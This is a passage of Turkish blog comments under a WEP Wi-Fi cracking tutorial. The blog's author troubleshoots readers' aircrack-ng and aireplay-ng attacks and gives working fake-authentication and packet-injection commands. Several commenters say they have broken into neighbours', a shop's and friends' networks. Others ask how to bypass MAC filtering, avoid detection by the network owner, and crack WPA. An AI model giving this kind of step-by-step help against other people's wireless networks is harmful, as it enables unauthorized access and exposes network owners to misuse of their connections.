  merhaba son aşama çok uzun sürdü #data 120000 oldu anca çözebildi. çok teşekkürler.

  • #300 Murat Çeşmecioğlu tarafından, tarihinde

   “failed next try…” yazısı bir hata değil. Gerektiği kadar data toplayamadığında daha sonra devam edeceğini belirtiyor. Şifre uzun olduğu için uzun sürmüş olabilir.

 201. #301 ayberk tarafından, tarihinde

  wpa/wpa2 psk ile şifrelenmiş ağları nasıl kırabiliriz? lütfen bu duruma da bi gözatabilir misiniz?

 202. #303 ofy tarafından, tarihinde

  Mrhaba ben bu yontemle web sifresini kirdim. Sonra modem icine girerek mac filtreleme bolumune girdim. Orada yanlislikla allow these secenegini tikladim yani asagidakilerine izin ver secenegi. Ama seceneklerden hic birini secmedim yani aga bagli olan cihazlarin hic.birini secmedim. Sorum su ben bi d ah a nasil baglanabilirim. Backtrack bu konuda yardimci olabilir mi. Sifresini biliyorum ama mac filtrelemesi olan modeme nasil baglanirim

  • #304 Murat Çeşmecioğlu tarafından, tarihinde

   Kötü olmuş 🙁 Aklıma gelen tek yöntem kendi MAC adresinizi modeminki gibi yapıp bağlanmayı denemek ama çok küçük bir ihtimal. Modem sahibinin sorunu fark edip resetlemesini beklemelisiniz belkide.

 203. #305 emrah tarafından, tarihinde

  atheros wireless ağ kartım var görmüyor ne yapabilirim ??

  • #306 Murat Çeşmecioğlu tarafından, tarihinde

   Model numarasını da belirtirseniz iyi olur, aynı model numarasına sahip arkadaşlar da çalışıp çalışmadığını görmüş olur. Belki çalıştıran birisi çıkıp yardımcı olabilir.

 204. #307 murat eroğlu tarafından, tarihinde

  teşekkürler..benim kartım atheros ar9485 backtrack algılar mı ? ona göre yüklemek istiyorum

 205. #309 Vahap tarafından, tarihinde

  Ya bana bu y ye basıp cevaplayacağım soru gelmiyor

 206. #310 burak tarafından, tarihinde

  Abi şu girişte şifresiz ve güvenli değil olarak gözüken ağlara bağlanıyorum şifre ve parola istiyor onu geçebilmenin yolu varmı

 207. #311 Vahap tarafından, tarihinde

  Hocam öncelikle herşey için teşekkürler ama şu use this packet sorusu bir türlü gelmiyor 200000 300000 paket topladım ama yinede gelmiyor eski yorumlarıda okudum modemden kaynaklanıyor demissiniz bunu cözemez miyiz acaba ?

  Teşekkürler.

 208. #312 mustafa tarafından, tarihinde

  Az önceki paket topladığımız pencereyi kapatmayın. Sonraki işlemler için yeni bir konsol penceresi açın. demişsiniz konsol penceresini nasıl açacağım bu konuda bilgim yok

  • #313 Murat Çeşmecioğlu tarafından, tarihinde

   Ekranın sol alt köşesindeki ikonlardan yeni konsol penceresi açabilirsiniz.

 209. #314 Berkay tarafından, tarihinde

  merhaba,bana bu yöntem çok uzun geldi wireless cracker v1 gibi programlar hakkında ne düşünüyorsunuz ?

  • #315 Murat Çeşmecioğlu tarafından, tarihinde

   Dediğiniz programı denemedim. Beini üzerindeki feeding bottle güzel bir program. Ancak onun da otomatik modunu kullanmıyorum. Komutları tek tıklama ile çalıştırabilmesi daha çok işime yarıyor.

 210. #316 memet tarafından, tarihinde

  hocam easy bcd kurulumunda hata alıyorum düzgün yüklenemedi diyor tekrar kurdum aynı hatayı tekrar veriyor yardımcı olabilirmisiniz

  • #317 Murat Çeşmecioğlu tarafından, tarihinde

   Yükleme dosyasına sağ tıklayıp yönetici olarak çalıştır seçeneğini seçip öyle yüklemeyi deneyin. Aslında bir hata vermemesi gerekli.

 211. #318 caner tarafından, tarihinde

  murat hocam merhaba,

  benim sıkıntım aşağıdaki komutu yazdıktan sonra aşırı şekilde paket okuyur yani use this packet seçeneği gelmiyor. read 100.000 olcak nerdeyse, bu şekilde bekletiyor.

  aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b 00:18:39:2B:4C:98 -h 00:17:c4:34:c7:de mon0

  bi yerde yanlışmı yapıyorum, yardımcı olursan çok sevinirim.

 212. #320 orhan tarafından, tarihinde

  Muratbey ,trafik yaratmak istedğimde bu hatayı alıyorum.. Sending Authentication Request (Open System) sence neden böyle bir hata alıyorum….

  • #321 Murat Çeşmecioğlu tarafından, tarihinde

   Modemle alakalı birşey o. O tarz modemlerde birisinin girmesini bekleyin.

 213. #322 halit senturk tarafından, tarihinde

  Üstad herseyi harfi harfine yaltim hatta suan 805000 den fazla data toppladim ama olmuyor next try with 810000 dedi ne yapmam lazim dewam edicem paket toplamaya sen cevap yazana dek

 214. #324 yahya tarafından, tarihinde

  S.A Murat abi . Ben topladığım paketleri kırmak istediğim zaman şu hatayı alıyorum;Failed. Next try with 5000 IVs.
  cevabını bekliyorum şimdiden teşekkürler .

 215. #326 ONUR tarafından, tarihinde

  en son aşamada aircrack-ng -a 1 deneme-01.ivs yazdıktan sonra [Failed. Next try with 5000 IVs] hatası aldım. sebebi nedir ? 150000 adet paket topladıktan sonra yazmıştım

  • #327 Murat Çeşmecioğlu tarafından, tarihinde

   Yeteri kadar paket toplamamışsınız demektir. Kendi kendine 5000 paket sonra tekrar dener.

 216. #328 Halit tarafından, tarihinde

  Arkadaşlar ben kırdım adamın şifresi 13 haneli çıktı xD inanamadım kırdığıma hatta 🙂 anladığım kadarıyla bu iş birazda şans 1milyon paket topladığımda kıramadım ama dün tekrar ugrastım yaklasık 200.000 paket sonra verdi şifreyi bana

  1. denememden sonra bende aynı hatayı aldım

  airodump-ng -c 11 –bssid 00:18:39:2B:4C:98 –ivs -w deneme mon0 yerindeki “deneme” yi deneme1 yaptım sonra aircrack-ng -a 1 deneme1-01.ivs ile devam ettim bence bir deneyin farklı isim ile kolay gelsin şimdi sıra wpa kırmakda xD

 217. #329 Alp tarafından, tarihinde

  Merhabalar ben backtrackı indirdim vs yaptım boottan giriyorum backtracka siyah ekranda yükleniyor yükleniyor sonra ath: unable to initialize hardware: initialization status: -19 çıkıyor ne yapmam gerekiyor? acaba kartımmı desteklemiyor laptop yeni daha 1 hafta olmadı alalı wifi kartı eski felanda değil atheros

 218. #330 Halit tarafından, tarihinde

  Bağlandığım ağın bir bilgisayarcı basit bir dükkan olduğunu öğrendim. Peki ben bu adamın beni izlememesi için nasıl davranmam ne yapmam gerekir ?

 219. #331 ismail tarafından, tarihinde

  mükemmelsiniz:))

 220. #333 Furkan tarafından, tarihinde

  Selam hocam onceliklen elinize saglik kolay gelsin. Ben hersiyi harfi harfine yaptim elde ettim key found 03:80:60:90:05 ASCII yede cevirince ??’?? cikiyo simdi ben normal bir sekilde wirles a baglandigimda sifre olarak ASCII yimi yazicam yoksa key found da gelen 0380609005 imi ?

 221. #335 mustafa tarafından, tarihinde

  wep şifresi kırdım windowsa geçtim dediğiniz gibi 2 tanesinide deneim ama windows … bağlantısını yapamadı diyor sorun ne olabilir

 222. #336 hasan tarafından, tarihinde

  üstad FF:FF:FF:FF:FF nedir ?

  • #337 Murat Çeşmecioğlu tarafından, tarihinde

   -c FF:FF:FF:FF:FF:FF yazdığımız zaman gönderilecek paketin hedef MAC adresini yayın olarak ayarlıyor. Kısaca özetlemek gerekirse ağdaki herkese gitmesini sağlıyor.

 223. #338 fatih tarafından, tarihinde

  Selamlar Flash belleğe yazdırıp yaptım boot oldu.. giriyorum ama sorun şu ki Ekran Ayarlamalarını YAPAMIYORUM.. bana ‘ no such file’ Hatasını veriyor. No directory Filan..

  onu geçtim Virtualbox Ta ise acılıyor SORUNSUZ ekran hatası olmadan AMA ORDA ‘da ıwconfıg de
  ( lo ) – (eht0) parametrelerini Görüyor AMA wlan0 ‘rı görmüyor.
  Virtual box ayarınların NETWORK Sekmesinden AĞ karıtını Seciyorum. yeniden başlatıyorum programı WİFİ de Acık Tabi.. YİNEDE AĞ KARTINI GÖRMüYOR..
  DAHA DEMİN BOOT’dan actım ve LİVE cd Seceneğini sectim.. LİNUX un Masaüstü görünmedi.. ama KARTI BULDU.. PAKET TOPLADIM.. 9000 tane Kendi Wifi Mi bile Kıramıyorum 😀
  Wifislax İle denedim.. olmadı ne denedi isem Kıramıyorum..Allah’tan modemın MAC korumasını kaldırdım.. 🙂
  BİR çözüm yolunu bana Gösterebilir misiniz. 🙂 Rica etsem 2 GÜNDÜR.. ugrasıyorum.
  BENDE Kİ BATTRACK 4 FİNAL Sürümü..
  Ayrıca wifislax 4.2 BİRDE : auditor-200605-02-ipw2100 . Var .. 3 ‘unude deniyorum SONUC 0
  yardım larınızı bekliyorum.. KOLAY gelsin

 224. #340 Yigit tarafından, tarihinde

  Hocam, dökümanın sayesinde 1 adet wep kırdım. Fakat 1 tane daha var onu kırmak istediğimde..
  “aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b 00:18:39:2B:4C:98 -h 00:17:c4:34:c7:de mon0” bu komutu yazdığım zaman reading packets diyor.. sayı artıyor da artıyor.. #data sabit.. ve “y” ye basıp use this packets diyebileceğim bir satır gelmiyor. Ne yapabiliriz?

  • #341 Murat Çeşmecioğlu tarafından, tarihinde

   Bu durumda tek yapabileceğimiz Ctrl+C ile durdurup yeniden başlatmak.

 225. #342 makif tarafından, tarihinde

  hocam konuyla biraz alakasiz olacak ama bana bi tek sen yardim edebilirsin bahsettiginiz yontem sayesinde bi tane wifi kirdim cok guvendigim 2 arkadasima kimseye dememesi sartiyla soyledim ama dostumunda dostu oldugunu unuttugum icin o da dostlarina soylemis ve yurtta kaldigim icin sifre ortam mali olmus degil online oyun oynamak google a zor giriyorum az bucuk bilgim var modemin arayuzune girdim fakat sifreler falan degistirilemiyor degismis gorunuyor modem arayuzunde ama gercekte bir degisiklik yok galiba kablo ile bagli olmam lazimmis ben mumkunse sifreyi degistirmek veya digerlerinin baglanmasini engellemek istiyorum bunu nasil basarabilirim su anda ne yapacagimi bilmiyorum tavsiyeleriniz nelerdir simdiden tesekkur ederim

 226. #344 onur tarafından, tarihinde

  bende bu 🙂 ler çıkmıyo yani işler yolunda gitmiyo paket alamıyorum nasıl halledebilirim o işi?

 227. #345 sait tarafından, tarihinde

  paket toplama ve deneme tüm harfler ve rakamlar için ne kadar sürer? teşekkürler.

 228. #347 Demir tarafından, tarihinde

  Iyi gunler Murat Bey;
  Benim bilgisayarimin ekran karti AR9485WB-EG ancak
  ben iwconfig yazdigimda sadece no wireless extensions yaziyor
  backtrack’in sitesinden gordugum kadariyla AR9285 destekleniyormus; bu konu hakkinda bir tavsiyeniz var midir?

  • #348 Murat Çeşmecioğlu tarafından, tarihinde

   iwconfig komutu ekran kartları için değil ki. Bir yanlışlık olmasın?

 229. #349 Fatih tarafından, tarihinde

  Selamlar Murat Bey,
  Anlatttığınız herşeyi tek tek yaptım.Öncelikle şöyle diyeyim;VMware üzerinde backtrak 5r2 gnome-32 yi kurdum ve usb adaptörüm alfa 06nhr 2 w bactrack de tanıdı adaptörü.Benim bu işlemleri yaparken karşılaştığım sorun şu;Kırmaya çalıştığım ağda biri olmadığı halde data yavaşta olsa artış gösteriyor.Data trafiğini artıran komutu girinceye kadar diyelimki data kısmı 10 oldu ben trafiği artıran komutu girdikten sonra baya hızlanıyor data kısmı ve sizinde belirttiğiniz gibi data kısmı 50000 i geçtikten sonra ki ben daha fazla bekledim denememin birinde 200000 oldu data daha sonra şifreyi kıran komutu girdikten sonra bende toplam toplanan ivs ler hızlandırma komutunu girmeden öncki data kadar yani 10 görünüyor.ne yaptıysam hızlandırmadan sonraki dataları okutamadım denemelerimde.Bunu nasıl aşabilirim murat bey yardımcı olursanız sevinirim.

 230. #351 Bari; tarafından, tarihinde

  Dostum programi HDDden boot ediyorum. Ilk denedigimde mac adresini yanlis girmistim son kisma kadar gelmistim sonra hata vermisti. Simdi ise her seyi dogru yapiyorum fakat Read xx packets… kisminda takiliyorum ctrl-c ile durdurup defalarca denedim konsolu-pc yi kapatip yeniden basliyorum olmuyo hep burda tikaniyorum?

  • #352 Murat Çeşmecioğlu tarafından, tarihinde

   Modemden kaynaklı bir sorun da olabilir. Farklı modemlerde denediniz mi?

 231. #353 Fatih tarafından, tarihinde

  Murat bey ilginç olan bişey daha var data akışını hızlandıran komutu girdiğimizde ilk konsol ekranında hackleyeceğimiz modemin ENC yazan kısmında WEP yazarken y enter yaptıktan sonra bu kısımda WPA yazmaya başlıyor.Bu neden dolayı oluyor acaba.Bu modemi epeydir görüyorum ve her seferinde wep korumalıydı.Sizin anlattığınız işlemin bu aşamasında neden wpa korumaya geçiyor anlamış değilim.windowda iken tarattığmda da wep korumalı görünüyor halen.

  • #354 Murat Çeşmecioğlu tarafından, tarihinde

   Dediğiniz gibi bir olayla karşılaşmamıştım hiç. Bende çözemedim şimdi. Belki çözen biri olursa yorumlara yazabilir.

 232. #355 hamit tarafından, tarihinde

  üstad bir onceki yazdiklarimin cogunun nedenini buldum .ctrl+z yapmadgm icinmis.ama saaldiri komutunu girince 🙂 seklindeki gulucuk isaretleri cikiyor.ama diger komutu girip enter yaptktan sonra this packet diyor ben y deyip enter deyince atak aniden kesiliyor.senin yazdiklarin ayniisini yazdim yani yanlislik yok.peki neden bu hatayi alyorm.cevabinizi beklyorm saygilar…

 233. #356 Gökhan tarafından, tarihinde

  hocam hersey tmm #data 150bın cıvarı son komutu gırdıgımde yeni bir konsola read 0 packets No network found, exiting outting aircrack-ng… yazıyor sıkıntı nedir ?

 234. #357 hamit tarafından, tarihinde

  benim sorunum ağın iyi çekmemesinden miş.ağı kırdım simdik citayi yukselttim wpa2 kırıyorum reaver ile .bu programda da ağ %80 in üzerinde bt de ise -60 in altinda olmaz ise cok süruyor.ama zevkli.

 235. #358 Recep tarafından, tarihinde

  iyi günler üstad sana bir sorunumu anlatmak istiyorum. ben backtrack 5 r 3 ü virtual box ile sanal disk oluşturarak masa üstümde açtım ve windowsla beraber kullanmaya bugun başladım. fakat kod aırmong-ng yazdığımda wireles adaptörümü görmüyor. bundan önce usb den unıtbootın yaparak açıyordum ve orada görüyordu hatta şifre kırmayıda başardım. fakat windowsla iletişimi olmadığı için birlikte kullanmak istedim. tekrar usb den denedim orada oluyor ama windowsla beraber kullandığımda wireles cihazımı görmüyor. bu konuda yardımcı olabileceğini düşündüm. cevabını bekliyor olacağım, şimdiden teşekkür ederim.

  • #359 Murat Çeşmecioğlu tarafından, tarihinde

   Virtualbox ile PCI kartları görmede sorun yaşayabilirsiniz. Virtualbox adaptörünüzü görmüyor. USB’den başlattığınızda normal işletim sistemi gibi çalıştığı için kartınızı tanımada sorun çıkmıyor.
   Sürekli USB kullanmak istemiyorsanız Dual boot anlatımları sitede var. Onları uygulayabilirsiniz.

 236. #360 Emrenail tarafından, tarihinde

  abi benim wifi kartımı okumuyor bunu nasıl halledebilirim usb ile nasıl kuruluyor anlatabilirmisin sana zahmet bulundugum yerde wep şifresi var onu kırmak istiyorum 🙂

 237. #362 emre tarafından, tarihinde

  hocam iyi calışmalar.

  ben daha baslamadan sorunla karsılastım.bilgisayarı actıgım zaman siyah ekranda bunlar yazıyor ve cozemedim yardımcı olursanız sevinirim

  booting back track
  filesystem type is ntfs,
  partition type 0x07
  kernel /casper/vanlinuz file :/cdrom/presced/custum.seed boot=casper i915.modeset=1 text splash vga=791–
  error15:file not found
  press any key to continue…

  yazısı var tekrar tekrar aynı hatayı veriyo yardımcı olurmusunuz?

 238. #364 ahmet tarafından, tarihinde

  2 milyon paket yollamasına rağmen kıramadı nedeni ne olabilir?

  • #365 Murat Çeşmecioğlu tarafından, tarihinde

   Aircrack-ng’yi çalıştırdığınızda orada da 2 milyon paket gözüküyor mu?

 239. #366 sefa tarafından, tarihinde

  hocam bende data kisminda pek bi artis olmuyo ?

 240. #368 Tofig tarafından, tarihinde

  Abi herseyi yaptim ama en sonda sifreyi bulmuyor “Faield next try with 100000 IVs yaziyor. 3 saat bekledim ama olmadi

 241. #370 ahmet tarafından, tarihinde

  ya ben başka bir yoldan yaptım tam tanımlanıyor diyor ve sonrada sınırlı erişim diyor nedeni nedir

  • #371 Murat Çeşmecioğlu tarafından, tarihinde

   Hangi yoldan yaptınız bilemiyorum. Şifreyi yanlış yazmış olabilirsiniz.

 242. #372 yasin tarafından, tarihinde

  Merhabalar hocam hersey tamam cok guzel ilerledi fakat en son komutu girdikten sonra yani aket toplamaya basladktan sonra y enter yapa agm ekran gelmedi suan 115 bin packets nyaziyor ne yapmaliyim lutfen yardm edin

 243. #373 CIZBIZ tarafından, tarihinde

  kardeş iyi hoşta enbaşta ağkartını görmüş senin bizimki görmedi onu da anlatsaydın keşke nasıl görmesini sağlıyacaz.Anlatmış isende bulamadım ağ kartımn modelini nasıl ogrenecem

  • #374 Murat Çeşmecioğlu tarafından, tarihinde

   Kartınızın sürücülerini bulursanız içindeki benioku dosyasında nasıl yüklendiğini bulabiliyorsununz. Ancak paket enjeksyonu olmadıktan sonra kırma konusunda işinize yaramaz.

 244. #375 faruk zorlu tarafından, tarihinde

  hocam ağ kartımı GÖRMÜYOR
  pardon, ondan dolayı programda ilerleme kaydedemiyorum

 245. #377 Abdullah tarafından, tarihinde

  Ilk önce çok çok teşekkür ediyorum ama sorun şu ki read packets bölümünde kaldım use this packet diye sormuyor 200bin Civarı paket oldu hala sormadi eski yorumlara baktım durdur tekrar baslat demişsiniz ama ben denedim olmadı birde şunu sorayım gülen yüzlerin olduğu yer paketleri okurken açık kalacakmi bende açık ama olmuyor işte lütfen yardım edin

 246. #379 eren tarafından, tarihinde

  hocam use this packet sorusu gelmiyor ne yapmalıyım

  • #380 Murat Çeşmecioğlu tarafından, tarihinde

   Durdurup yeniden denemek bir çözüm olabilir. Olmuyorsa ağda birileri varken deneyin.

 247. #381 Ömer tarafından, tarihinde

  Murat hocam çok saolun çok işime yaradı dediklerinizi aynen yaptım ve olumlu sonuç elde ettim yalnız bu yöntemi WPA-PSK için de denesek aynı şekilde kıramaz mıyız ?

  • #382 Murat Çeşmecioğlu tarafından, tarihinde

   Tebrikler. WPA’nın yöntemi daha farklı. Aynı şekilde kıramıyoruz malesef. WPA kullanan kablosuz ağların şifrelerini kırmak hakkındaki yazım:

 248. #383 emre tarafından, tarihinde

  murat bey, back track in resmi sitesinde uyumlu kart olarak görünen Edimax EW-7318USG model kart aldım. Ama bir türlü back track görmüyor kartı. 32 bit bt 5 r3 gnome vmware imajı kullanıyorum.

  Özel bişey yapmak gerekiyormu. Mesela network kartı nat mı olacak bridged mı. Net bağlantısını kesmek gerekiyor mu. Veya kullandığım işletim sistemi mi yanlış hocam. Ne yaptıysam olmadı.

 249. #385 ibrahim tarafından, tarihinde

  Murat bey;
  Airodump-ng mon0 yzıyorum saatlerce arattırmama ragmen 1 tane bile ag bulamıyor oysaki aktif bir cok ağ mevcut windwos ortamında görülen

  • #386 Murat Çeşmecioğlu tarafından, tarihinde

   airodump-ng -c 6 mon0 gibi belirli bir kanalda aratmayı deneyin birde. Kartınızla ilgili bir problem de olabilir.

 250. #387 özay tarafından, tarihinde

  Murat bey,
  Ben şifreyi kırdım ama ascii kodu çok uzun çıktı ve windowsta direk bağlanırken yazınca kabul etmiyo. Ama key found %100 correct falan yazdı.

  ascii kodu şu: 20sGbhFLQxt7k
  Hex kodu da şu: 32:30:73:47:62:68:46:4C:51:78:74:37:6B

  İnternette araştırdım ama bu kodları normal sayıya çevirici bulamadım. bi yardım etseniz ?

 251. #389 katran tarafından, tarihinde

  BackTrack, kablosuz ağ kartMI tanımadı ne yapmam gerekiyor tanıtabilmek için yardım edersen sevinirim

 252. #391 yunus emre tarafından, tarihinde

  wep şifreleme türü oluyomu

 253. #393 Cihan tarafından, tarihinde

  Keyfound yazıyor ama ascii yazmıyor ne yapmalıyım?

  • #394 Murat Çeşmecioğlu tarafından, tarihinde

   Ascii haline ihtiyacınız yok. hex halinde aradaki iki nokta işaretleri olmadan şifreyi yazdığınızda bağlanacaktır.

 254. #395 halit senturk tarafından, tarihinde

  Murat hocam daha onceden de yorum yazdiydim cvpladiydiniz tskler simdi ise farkli bir sıkıntı boy gosterdi. Agda trafik olusturamiyorum daha dogrusu olusturuyorum fakat #data da bir artis olmuyor. Agda kimse yok iken dk basi 1 #data geliyor trafik olusturmaya kalktigimda da ayni. Yazmis oldugunuz Herseyi dostogru yapiyorum zati 20 den fazla kirdim ogrenci arkadaslarin evlerine gidip xD neyse cevabinizi bekliyorum

 255. #397 halit senturk tarafından, tarihinde

  Acaba adam mac filitreleme mi kullaniyor?

 256. #398 alp tarafından, tarihinde

  Intel Centrino Wireless-N 2230 . Bu modeli desteklemiyor mu ? Göremedim ama bi umut soruyorum 🙂

 257. #400 haluk tarafından, tarihinde

  selamlar, bende bt5 de masaüstü ikon vs çıkmıyor yeni pencere kısmını alt+f1—f6 ile çözdüm 50bin paket de yaptım, en son aircrack komutunda 2-3 sn de failed, try with next 50.000 ivs diyor bu kadar kısa sürmesi ve hemen failed demesi normal midir?

 258. #402 oguzcan uysal tarafından, tarihinde

  3 gundur ugrasmama ragmen paket toplamak icin verdiginiz komutlari giriyorum ama artis yok baska bir yolu varmi paket toplamanin telefondan giris yapmayi denedim o zaman artis oluyo ama dakikada 5 10 tane yardımcı olursanız sevinirim

 259. #404 dabbe tarafından, tarihinde

  ya ben hiçbirini anlamadom bende packard bell laptop var hocam bana bi anlatabilirmisiniz.şimdiden teşekkürler

 260. #406 sefai38 tarafından, tarihinde

  selam murat bey dediğnizi harfiyen uyguladım, data sayısı 84856 olmasına rağmen aircrack-ng -a 1 deneme-01.ivs kumutunu verdiğimde , aynen şu yazı çıkıyor. root@bt:~# aircrack-ng -a 1 deneme-01.ivs
  Opening deneme-01.ivs
  Read 1 packets.

  # BSSID ESSID Encryption

  1 burda bağlı olduğum modem bilgisini sildim WEP (0 IVs)

  Choosing first network as target.

  Opening deneme-01.ivs
  Attack will be restarted every 5000 captured ivs.
  Starting PTW attack with 0 ivs.

  Aircrack-ng 1.1 r2178

  [00:00:00] Tested 0 keys (got 0 IVs)

  KB depth byte(vote)
  0 255/256 FF( 0) 01( 0) 02( 0) 03( 0) 04( 0)
  1 255/ 1 FF( 0) 01( 0) 02( 0) 03( 0) 04( 0)
  2 0/ 2 00( 0) 01( 0) 02( 0) 03( 0) 04( 0)
  3 0/ 40 00( 0) 01( 0) 02( 0) 03( 0) 04( 0)
  4 0/ 1 00( 0) 01( 0) 02( 0) 03( 0) 04( 0)

  Failed. Next try with 5000 IVs. cevap verirseniz sevinirim

  • #407 Murat Çeşmecioğlu tarafından, tarihinde

   Sanirim topladığınız paketler içinde ivs paketleri yok. Aireplay’i kapatıp tekrar deneyin.

 261. #408 onur tarafından, tarihinde

  FAILED. Next try with 5,000 IV’s hatası ne demek ne yapmalıyım

 262. #410 burak tarafından, tarihinde

  merhaba;ben şifre yi kırdım win8 de calıştı ama ben Backtrack 5 te girmek istiyorum giremiyorum lütfen yardım edin

  • #411 Murat Çeşmecioğlu tarafından, tarihinde

   Backtrack menusunde internet isimli menünün altında wicd uygulamasi var. Onunla baglanabilirsiniz.

 263. #412 Hüseyin Azad Dayanan tarafından, tarihinde

  benim wirelesste backtrack3 desteği yazıyor ne işe yarar

 264. #414 HALİT tarafından, tarihinde

  iyi akşamlar murat bey ellerinize sağlık ben hepsini anladımda girmiş olduğunuz bu komutu ( FF:FF:FF:FF:FF:FF ) nerden aldınız onu anlayamadım. slm

  • #415 Murat Çeşmecioğlu tarafından, tarihinde

   O komutla ilgili bir parametre. Yanlış hatırlamıyorsam gönderilen paketlerin kaynağı ile ilgili. Yardım menüsünde yazar.

   aireplay-ng –help

 265. #416 ibrahim tarafından, tarihinde

  hocam öncelikle eyvallah paylaşım için. Şimdi benim olduğum yerde wep güvenlikli bi wifi var. W7 netbookum var ben bununla şifreyi kırıp normal olarak kullanabilirim de mi? Bide w7 için backtrackın hangi halini indiricez orda kde gnome felan yazıyo. Bilgisayar 32 bit şimdiden teşekkürler

  • #417 Murat Çeşmecioğlu tarafından, tarihinde

   Backtrack bir program değil, işletim sistemi. Bu yüzden bilgisayarın Win7 olması birşeyi değiştirmez. Backtrack’in 32bit sürümünü indirmeniz yeterli.

 266. #418 halil tarafından, tarihinde

  hocam ben backtrack 5 usb den boot menüsünden kurdum laptobumun wifi kartını okumuyor acaba özel wifi kartımı alman gerekli

 267. #420 deniz yavuz tarafından, tarihinde

  Merhaba, şu aşamaya kadar geldim..

  aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b 00:18:39:2B:4C:98 -h 00:17:c4:34:c7:de mon0
  Bu yazdığınız komut sonucunda bir kaç paket okunduktan sonra üstteki gibi bir ekranla karşılaşacaksınız.

  Fakat bir kaç paket sizde 19 gözüküyor bende ise şuan 300.000 i geçti. size:72…. gibi yazılar gelmedi. Hala paket okuyor. Ne yapmalıyım beklemelimiyim? Teşekkürler

 268. #422 Burak tarafından, tarihinde

  Merhaba
  aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b 00:18:39:2B::98 -h 00:17:c4:34:c7:de mon0
  komutundan sonra kaldı , 6000 paket okudu ama hala okumaya devam ediyor sizde 19 paket okumuş okumuş

 269. #423 burak tarafından, tarihinde

  Şifreyi kırmasına kırdım da,

  borcundan dolayı kapalı çıktı 😀

 270. #425 can tarafından, tarihinde

  ben bir haftadır ugrasıyorum backtrack 5r2 ıle denıyorum . Hersey ıyı guzel etrafta WEP ıle şifrelenmiş sinyal gücü iyi olan bir modem var . Ama lakin kimse bağlı değil ve ben burada takılıp kalıyorum face atak yapmaya çalışıyorum tek aşamadığım nokta o yani data toplayamıyorum bir türlü onuda yapsam çok güzel olacak ama dedigim gibi bir türlü bu aga kımse baglı olmadıgı ıcın yapamıyorum fake atak yapmayı bı anlatırmısınız

  • #426 Murat Çeşmecioğlu tarafından, tarihinde

   Bu yazının içinde ağa kimse bağlı değilse nasıl yapmamız gerektiğini anlattım.

   aireplay-ng -1 2 -o 10 -q 10 -a (MODEMİN MAC ADRESİ) -h (KARTIMIZIN MAC ADRESİ) mon0

 271. #427 demre tarafından, tarihinde

  merhaba ben ağda trafik oluşturma kısmında takıldım unsuccessful diyo ve bir süre sonra duruyor data artışı da olmuyor agdada kimse yok

 272. #428 burak tarafından, tarihinde

  Selam, 22 saattir paket toplama islemi yapiyorum ve 5.5 milyon iv oldu hala sifreyi bulamadim.

 273. #430 Anıl tarafından, tarihinde

  çok yararlı bi anlatım yapmışnız tebrik ederim ama benim bi sorunum var bi kaç yorumda daha gördüm aynı sorunu yaşayanı data toplayamıyorm bahsettiniz ‘y’ tuşuna basma işlemi gelmiyor diğer işlemleri harfiyen yaptım doğru yaptıma eminim bi kaç cevabınızda tekrar deneyin yazmışınız çok denedim ama yine olmadı

  • #431 Murat Çeşmecioğlu tarafından, tarihinde

   Farklı yöntemleri deneyin. Ağda birileri varken kırmak için uğraşın.

 274. #432 ali haydar tarafından, tarihinde

  hocam bende 4 satırda bir gelmesi gereken gülücük gelmiyor ve attack unsuccesful diyor ne yapmalıyım cevap verirseniz sevinirim

  • #433 Murat Çeşmecioğlu tarafından, tarihinde

   Modemden kaynaklı bir sorun olabilir. Ağda birileri varken paket toplamayı deneyin.

 275. #434 samet tarafından, tarihinde

  key found! [01:02:03:04:05] diyor, ascii karşılığı yok. bir yerlerde bir terslik var ama çözemedim

 276. #436 gökhan tarafından, tarihinde

  merhaba ben wpa2/psk lı bir şifre kırmak istiyorum wmare den isoyu çalıştırsam 5 sürümünde kırabilirmiyim ?

 277. #438 aylin tarafından, tarihinde

  murat bey ben yeni backtrack5 kde ıso indiriyorum. easyBCD 2.2 yi de indirdim şu an backtrack inmesini bekliyorum. 4 için yaptıklarnızn aynısını 5 de de mi uygulayacağız ?

 278. #440 emre tarafından, tarihinde

  slm murat abi benim bi sorunum var

  aireplay-ng -1 2 -o 10 -q 10 -a **:**:**:**:**:** -h **:**:**:**:**:** mon0
  yazdıktan sonra şu gülücük işaret geliyor bazende “sending authentication request (open system)” deyim gülücük işareti gelmiyor bazende sürekli “sending authentication request (open system)” diyor biraz ileride her 4 satırda gülücük geliyo ama. sonra “aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b 00:18:39:2B:4C:98 -h 00:17:c4:34:c7:de mon0” bu kodu yazıyop yeni pencere açıp, sürekli paket veriyo “read 5356 packets…” sonrası gelmiyince y tuşuna basıp enter diyemiyo durdurup yeniden başlatıyom olmuyo
  lütfen yardım et abi.. saygılar

 279. #442 beytullah tarafından, tarihinde

  Merhaba,
  Çevredeki Wep ağların ESSID kısmında length: 0 yada 1 şeklinde yazıyor. Ağ ismini göremiyorum. Daha sonra paket oluşturma işlemine geçince ”Please specify an ESSID (-e)” hatası alıyorum. Nasıl çözüm uygulayabilirim.

  • #443 Murat Çeşmecioğlu tarafından, tarihinde

   İsmi gizlenmiş ağlar bunlar. Bunlar ile hiç uğraşmadım. İsmini bilmek gerekiyor sanırım.

 280. #444 arda tarafından, tarihinde

  bende #Data bölümündeki paketler çok yavaş artıyor ve kesik kesik bazen de durmuş gibi oluyor

  • #445 Murat Çeşmecioğlu tarafından, tarihinde

   Ağda çok fazla hareketlilik olmayabilir. Ağda birileri olması daha hızlı artmasını sağlar.

 281. #446 Gani tarafından, tarihinde

  ben daha nereden indireceğimi bulamadım nasıl başlıcam

  • #447 Murat Çeşmecioğlu tarafından, tarihinde

   Google’da “Backtrack” yazıp, ilk çıkan sonuçtaki siteden indirebilirsiniz.

 282. #448 coşkun tarafından, tarihinde

  Murat kardeşim herşey iyi güzel de R3 yükledim taramaya geçince WORDLİST istiyor
  ayrıca wordlit generator indirdim ve yeni vord list oluşturmaya kalktı yalnız 10 haneli karışık (rakam – harf) oluşturabilmesi için tam 500 saat gerekiyor okadar sabrım yok bir fikir ver lütfen
  TEŞEKÜRLER

  • #449 Murat Çeşmecioğlu tarafından, tarihinde

   Benim de o kadar sabrım yok 🙂 Ayrıca bu wordlist’i deneme süresi var.
   WPA şifrelemesi kırma için taktik bence şöyle olmalı:
   1. Şifreyi tahmin edin.
